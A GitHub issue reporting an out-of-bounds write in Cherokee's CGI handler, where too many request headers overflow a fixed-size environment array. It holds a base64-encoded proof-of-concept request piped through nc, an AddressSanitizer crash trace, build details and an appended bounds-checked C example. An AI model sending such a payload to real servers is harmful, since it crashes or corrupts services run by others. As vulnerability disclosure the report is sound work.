
CGI Handler too many headers #1224

Open
mmmds opened this issue Jul 25, 2019 · 1 comment

Comments

@mmmds

commented Jul 25, 2019

struct cherokee_handler_cgi_t (handler_cgi.h) consists of a fixed-size array (char *envp[ENV_VAR_NUM]) for environment variables. Sending a request with a lot of headers causes int envp_last to be incremented to a value greater than ENV_VAR_NUM, resulting in reading outside the array.

handler_cgi.c:

310     cgi->envp[cgi->envp_last] = entry;
311     cgi->envp_last++;

PoC

echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMTcwMTQxMTgzNDYwNDY5MjMxNzMxNjg3MzAzNzE1ODg0MTA1NzI3Ckhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogNDI5NDk2NzI5NS4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiBweXRob24KCgo=' | base64 -d | nc 127.0.0.1 80

ASAN

=================================================================
==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
==10864==The signal is caused by a WRITE memory access.
    #0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
    #1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
    #2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
    #3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
    #4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
    #5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
    #6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
    #7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
    #8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
    #9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
    #10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
Thread T7 created by T0 here:
    #0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
    #2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
    #3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
    #4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
    #5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
    #6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

==10864==ABORTING

Setup:

  • Ubuntu 18.04 64 bit

  • source code from github, commit 9a75e65

  • build command:

ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
  • files in webroot:

mkdir /var/www/test{1..20}; for i in `seq 1 20`; do echo test > test$i/test.html; done

  • configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust
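The following is an added example, not Cherokee's code: it reproduces the envp[ENV_VAR_NUM] / envp_last pattern the report describes, but with the bounds check that the reported code path lacks, so an over-long header list is refused instead of written past the end of the array. All names (env_table_t, env_add_pair, build_env_from_headers) and the capacity of 8 are assumptions chosen for the demonstration.

```c
/* Added example, modelled on the fixed-size envp table described in the issue.
 * Not Cherokee's code; names and the capacity are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Small capacity so the limit is reached quickly in the demo (constructed). */
#define ENV_VAR_NUM 8

typedef struct {
    char *envp[ENV_VAR_NUM]; /* fixed-size table; execve() expects a NULL terminator */
    int   envp_last;         /* number of entries currently stored */
} env_table_t;

void env_init(env_table_t *t)
{
    memset(t, 0, sizeof *t);
}

/* Append "name=value". Returns 0 on success, -1 if the table is full or
 * allocation fails; on failure nothing is written. One slot is reserved so the
 * terminating NULL always fits, which is the check the reported path is missing. */
int env_add_pair(env_table_t *t, const char *name, const char *value)
{
    if (t->envp_last < 0 || t->envp_last >= ENV_VAR_NUM - 1)
        return -1;

    size_t len = strlen(name) + 1 + strlen(value) + 1;
    char *entry = malloc(len);
    if (entry == NULL)
        return -1;
    snprintf(entry, len, "%s=%s", name, value);

    t->envp[t->envp_last++] = entry;
    t->envp[t->envp_last] = NULL; /* keep the table NULL-terminated */
    return 0;
}

void env_free(env_table_t *t)
{
    for (int i = 0; i < t->envp_last; i++)
        free(t->envp[i]);
    t->envp_last = 0;
    t->envp[0] = NULL;
}

/* Simulate building a CGI environment from a request carrying n_headers
 * repeated Host headers (constructed input). Returns how many were accepted;
 * a result smaller than n_headers means the table refused the rest and the
 * caller should reject the request instead of continuing. */
int build_env_from_headers(int n_headers)
{
    env_table_t t;
    int accepted = 0;

    env_init(&t);
    for (int i = 0; i < n_headers; i++) {
        if (env_add_pair(&t, "HTTP_HOST", "127.0.0.1") != 0)
            break;
        accepted++;
    }
    env_free(&t);
    return accepted;
}

int main(void)
{
    int n = build_env_from_headers(200);
    printf("accepted %d of 200 headers (capacity %d)\n", n, ENV_VAR_NUM - 1);
    return 0;
}
```

The point of the reserved slot is that a fully populated table still ends in NULL; without it, a table filled to exactly ENV_VAR_NUM entries has no terminator and execve() would read past the array just as the unbounded append writes past it.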

@skinkie skinkie self-assigned this Jul 25, 2019

@skinkie skinkie added the t:bug label Jul 25, 2019

@skinkie

Member

commented Jul 25, 2019

We should investigate if we want to keep adding headers or quit before that.
